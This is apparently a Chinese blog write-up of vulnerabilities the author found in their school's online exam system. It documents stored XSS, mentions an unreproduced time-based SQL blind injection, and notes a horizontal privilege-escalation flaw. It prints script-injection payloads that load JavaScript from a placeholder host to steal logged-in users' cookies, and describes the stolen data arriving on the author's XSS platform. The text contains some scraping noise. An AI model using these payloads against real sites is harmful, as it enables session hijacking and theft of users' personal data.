记录一次对学校考试系统的漏洞挖掘

引言~

最近学校因为方便咱们学生的平时测试,因此新开了个考试系统,闲着无聊我就抱着玩的心态去测试了一波,因为本篇是用来锻炼我将来写报告的能力,因此格式会稍有变化web


正文开始

标题:中国职工电化教育中心处考试系统处存在存储型xss
漏洞类别:事件型漏洞
厂商信息:中国职工电化教育中心
漏洞类型:xss(存储型)
漏洞等级:中危
漏洞简述:该页面在未检验数据是否存在XSS代码的状况下,便将其存入数据库。并且当下一次从数据库中获取该数据时程序也未对其进行过滤,页面会再次执行插入的恶意XSS代码,存储型XSS能够持续攻击用户。当目标用户进入含有xss恶意代码的页面时,存放在服务器的xss代码会从服务器解析以后加载出来。受害者只要访问插入xss攻击的页面,恶意脚本就能成功可以盗取当前登陆用户的cookie,能形成用户敏感信息的泄露,能够配合csrf进行钓鱼攻击
sql



复现步骤

一.往可能存在xss漏洞的输入框(25题笔记)构造如下代码进行验证:数据库

"> <script src="http://xxx.com/myjs/alert.js"></script>

在这里插入图片描述
成功出现弹窗,初步判断存在xss漏洞
在这里插入图片描述服务器

相关验证:在考试结果页面测试xss弹窗时,若是不点击肯定在本页面弹出的xss窗口,那么与该页面关联的其它页面会出现卡死,致使与之关联的页面没法正常使用cookie

在这里插入图片描述
关闭该页面退出从新进去后,发现页面从新xss弹窗,这时候能够肯定,xss的类型为存储型xss
在这里插入图片描述xss

二.利用自建xss平台插入js验证代码来获取用户敏感信息svg

“> <script src="http://xxx.com/myjs/cs.js"></script>

在这里插入图片描述
插入攻击语句时,f12能够清楚的看到页面加载了个人xss平台测试

在这里插入图片描述
语句插入成功后,到xss平台观看效果
在这里插入图片描述
不难看出xss平台准确的列出登陆用户的敏感信息,以及要请求访问的页面,由于是测试,因此个人xss代码没作过多的处理,若是有不法分子经过高明的手法构造xss语句来获取非法的用户敏感信息,后果将不堪设想!!!3d

关闭该页面退出从新进入
在这里插入图片描述
发现xss弹窗仍在
在这里插入图片描述
并且xss平台再次接收到了页面访问者的敏感信息
在这里插入图片描述code

到此,漏洞复现完毕,能够肯定页面存在存储型xss

补充:修改信息处也存在xss存储型漏洞,并且考试页面存在sql时间盲注,(因为是内网服务器,顺手测试并无截到相关图片),但因为盲注太过麻烦,因此没有复现

除了xss漏洞外,
经过改URL地址栏能够查看不一样用户信息,证实对用户的身份不作效验,有可能存在水平越权漏洞!!
在这里插入图片描述